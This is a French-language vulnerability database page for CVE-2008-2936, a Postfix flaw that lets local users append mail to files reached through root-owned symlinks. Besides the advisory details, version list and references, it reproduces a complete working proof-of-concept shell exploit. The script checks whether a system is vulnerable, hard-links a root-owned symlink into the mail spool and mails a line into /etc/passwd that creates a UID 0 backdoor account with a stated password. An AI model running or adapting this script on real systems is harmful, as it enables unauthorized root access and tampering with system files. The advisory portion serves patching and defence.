CVE-2008-2936 : Détail

CVE-2008-2936

A01-Broken Access Control
0.12%V3
Local
2008-08-18
17h00 +00:00
2018-10-11
17h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Postfix before 2.3.15, 2.4 before 2.4.8, 2.5 before 2.5.4, and 2.6 before 2.6-20080814, when the operating system supports hard links to symlinks, allows local users to append e-mail messages to a file to which a root-owned symlink points, by creating a hard link to this symlink and then sending a message. NOTE: this can be leveraged to gain privileges if there is a symlink to an init script.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-264 Category : Permissions, Privileges, and Access Controls
Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.2 AV:L/AC:H/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 6337

Date de publication : 2008-08-30 22h00 +00:00
Auteur : RoMaNSoFt
EDB Vérifié : Yes

#!/bin/sh # # "rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936) # by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <roman@rs-labs.com> # # Tested: Ubuntu / Debian # # [ Madrid, 30.Aug.2008 ] # # Config writable_dir=/tmp spool_dir=/var/mail # Use "postconf mail_spool_directory" to obtain this user=root target=/etc/passwd useful_link=/usr/bin/atq # lrwxrwxrwx 2 root root 2 2007-05-04 22:15 /usr/bin/atq -> at useful_link_dst=at # Tip: find / -type l -uid 0 -print -exec ls -l {} \; | less seconds=3 user_in_passwd="dsr:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh" # Pass is "dsrrocks" postfix=`which postfix` # /usr/sbin/postfix postconf=/usr/sbin/postconf postmap=/usr/sbin/postmap # Funcs quit() { echo "$1" exit } # Step 1: is my system vulnerable? head -n 9 $0 | tail -n 8 if [ $postfix ] ; then echo "[*] Postfix seems to be installed" else quit "[!] Are you sure Postfix is installed?" fi mkdir -p $writable_dir/pocfix touch $writable_dir/pocfix/src ln -s $writable_dir/pocfix/src $writable_dir/pocfix/dst1 ln $writable_dir/pocfix/dst1 $writable_dir/pocfix/dst2 if [ -L $writable_dir/pocfix/dst2 ] ; then echo "[*] Hardlink to symlink not dereferenced" rm -rf $writable_dir/pocfix else rm -rf $writable_dir/pocfix quit "[!] Hardlink to symlink correctly dereferenced. System is not vulnerable" fi if [ -d $spool_dir -a -w $spool_dir ] ; then echo "[*] Spool dir is writable" else quit "[!] Spool dir is not writable" fi if [ -e $spool_dir/$user ] ; then rm -f $spool_dir/$user echo "[*] Mailbox for \"$user\" found. Trying to delete it" if [ -e $spool_dir/$user ] ; then quit "[!] Couldn't delete it" else echo "[*] Deletion ok" fi fi if [ -e $spool_dir/$useful_link_dst ] ; then rm -f $spool_dir/$useful_link_dst echo "[*] Mailbox for \"$useful_link_dst\" found. Trying to delete it" if [ -e $spool_dir/$useful_link_dst ] ; then quit "[!] Couldn't delete it" else echo "[*] Deletion ok" fi fi aliases=`$postconf alias_database | cut -d"=" -f2` $postconf alias_maps | grep -q $aliases if [ $? -eq 0 ] ; then if [ $aliases ] ; then $postmap -q $user $aliases > /dev/null if [ $? -eq 0 ] ; then quit "[!] Mail alias for \"$user\" exists" fi fi fi lda=`$postconf mailbox_command | cut -d"=" -f2` if [ $lda ] ; then quit "[!] Non-Postfix LDA detected" fi $postconf home_mailbox | grep -q '/$' if [ $? -eq 0 ] ; then quit "[!] Maildir-style mailbox detected" fi # Step 2: Exploiting ln -f $useful_link $spool_dir/$user 2> /dev/null || quit "[!] Couldn't create hardlink (different partitions?)" ln -s -f $target $spool_dir/$useful_link_dst 2> /dev/null || quit "[!] Couldn't create symlink pointing to target file" cp -f $target $writable_dir/pocfix_target_backup.$$ && echo "[*] Backed up: $target (saved as \"$writable_dir/pocfix_target_backup.$$\")" echo "[*] Sending mail ($seconds seconds wait)" echo $user_in_passwd | /usr/sbin/sendmail $user sleep $seconds diff -q $target $writable_dir/pocfix_target_backup.$$ > /dev/null if [ $? -eq 0 ] ; then echo "[!] Exploit failed" else echo "[*] Exploit successful (appended data to $target). Now \"su dsr\", pass is \"dsrrocks\")" fi rm -f $spool_dir/$user rm -f $spool_dir/$useful_link_dst # milw0rm.com [2008-08-31]

Products Mentioned

Configuraton 0

Postfix>>Postfix >> Version 2.3.0

Postfix>>Postfix >> Version 2.3.1

Postfix>>Postfix >> Version 2.3.2

Postfix>>Postfix >> Version 2.3.3

Postfix>>Postfix >> Version 2.3.4

Postfix>>Postfix >> Version 2.3.5

Postfix>>Postfix >> Version 2.3.6

Postfix>>Postfix >> Version 2.3.7

Postfix>>Postfix >> Version 2.3.8

Postfix>>Postfix >> Version 2.3.9

Postfix>>Postfix >> Version 2.3.10

Postfix>>Postfix >> Version 2.3.11

Postfix>>Postfix >> Version 2.3.12

Postfix>>Postfix >> Version 2.3.13

Postfix>>Postfix >> Version 2.3.14

Postfix>>Postfix >> Version 2.4.0

Postfix>>Postfix >> Version 2.4.1

Postfix>>Postfix >> Version 2.4.2

Postfix>>Postfix >> Version 2.4.3

Postfix>>Postfix >> Version 2.4.4

Postfix>>Postfix >> Version 2.4.5

Postfix>>Postfix >> Version 2.4.6

Postfix>>Postfix >> Version 2.4.7

Postfix>>Postfix >> Version 2.5.0

Postfix>>Postfix >> Version 2.5.1

Postfix>>Postfix >> Version 2.5.2

Postfix>>Postfix >> Version 2.5.3

Postfix>>Postfix >> Version 2.6.0

Références

http://secunia.com/advisories/32231
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/31469
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.debian.org/security/2008/dsa-1629
Tags : vendor-advisory, x_refsource_DEBIAN
http://secunia.com/advisories/31530
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securitytracker.com/id?1020700
Tags : vdb-entry, x_refsource_SECTRACK
http://www.kb.cert.org/vuls/id/938323
Tags : third-party-advisory, x_refsource_CERT-VN
http://article.gmane.org/gmane.mail.postfix.announce/110
Tags : mailing-list, x_refsource_MLIST
http://securityreason.com/securityalert/4160
Tags : third-party-advisory, x_refsource_SREASON
http://www.securityfocus.com/bid/30691
Tags : vdb-entry, x_refsource_BID
http://secunia.com/advisories/31474
Tags : third-party-advisory, x_refsource_SECUNIA
https://www.exploit-db.com/exploits/6337
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.redhat.com/support/errata/RHSA-2008-0839.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/31500
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/31477
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/31485
Tags : third-party-advisory, x_refsource_SECUNIA
https://usn.ubuntu.com/636-1/
Tags : vendor-advisory, x_refsource_UBUNTU
http://www.mandriva.com/security/advisories?name=MDVSA-2008:171
Tags : vendor-advisory, x_refsource_MANDRIVA
http://www.vupen.com/english/advisories/2008/2385
Tags : vdb-entry, x_refsource_VUPEN
http://security.gentoo.org/glsa/glsa-200808-12.xml
Tags : vendor-advisory, x_refsource_GENTOO